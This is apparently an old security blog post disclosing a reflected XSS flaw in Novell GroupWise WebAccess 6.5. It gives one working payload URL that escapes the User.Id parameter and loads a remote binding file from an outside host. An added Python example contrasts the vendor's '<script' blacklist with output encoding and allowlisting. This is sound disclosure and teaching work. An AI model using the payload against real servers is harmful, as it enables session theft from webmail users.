Novell GroupWise WebAccess XSS
Published on: 1185673673
Someone sent his referer, pointing out that he uses Novell. I won't tell who, but I did find out that it's vulnerable to XSS. The vulnerable application was Novell GroupWise WebAccess version 6.5. Novell does filter for XSS, but they make the obvious mistake of replacing instances of <script with <!-- and: <!. If you are quick, you can see who it was in my referer list in the top right. I put this page up to show people that it is a bad idea to send your referer along; I hope it helps.
/servlet/webacc?User.Id="><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"
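The following is an added example, not code from the original post or from Novell. It models the `<script` replacement described above next to contextual output encoding and an allowlist check, and runs the post's payload through each. The template, the user ID pattern and the assumption that User.Id is reflected into a double-quoted attribute are hypothetical.

```python
import html
import re

# Payload copied verbatim from the User.Id parameter shown in the post.
PAYLOAD = ('"><STYLE>BODY{-moz-binding:url('
           '"http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"')

# Hypothetical policy: characters a mailbox user ID may contain.
USER_ID_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def blacklist_filter(value: str) -> str:
    """Model of the filter the post describes: '<script' becomes '<!--'."""
    return re.sub(r"<script", "<!--", value, flags=re.IGNORECASE)


def encode_for_attribute(value: str) -> str:
    """Encode for a quoted HTML attribute: & < > " ' become entities."""
    return html.escape(value, quote=True)


def is_valid_user_id(value: str) -> bool:
    """Allowlist check applied on input, before any rendering."""
    return USER_ID_RE.fullmatch(value) is not None


def render(value: str) -> str:
    # Hypothetical template reflecting the parameter into an attribute.
    return '<input name="User.Id" value="{}">'.format(value)


def can_break_out(reflected: str) -> bool:
    """True if the reflected value still carries markup metacharacters."""
    return any(ch in reflected for ch in '"<>')


if __name__ == "__main__":
    weak = blacklist_filter(PAYLOAD)
    safe = encode_for_attribute(PAYLOAD)
    print("blacklist changed input:", weak != PAYLOAD)
    print("blacklist output breaks out:", can_break_out(weak))
    print("encoded output breaks out:", can_break_out(safe))
    print("allowlist accepts payload:", is_valid_user_id(PAYLOAD))
    print(render(safe))
```

The blacklist leaves the payload untouched because it contains no `<script` token, while encoding at the point of output neutralises it regardless of which tag is used.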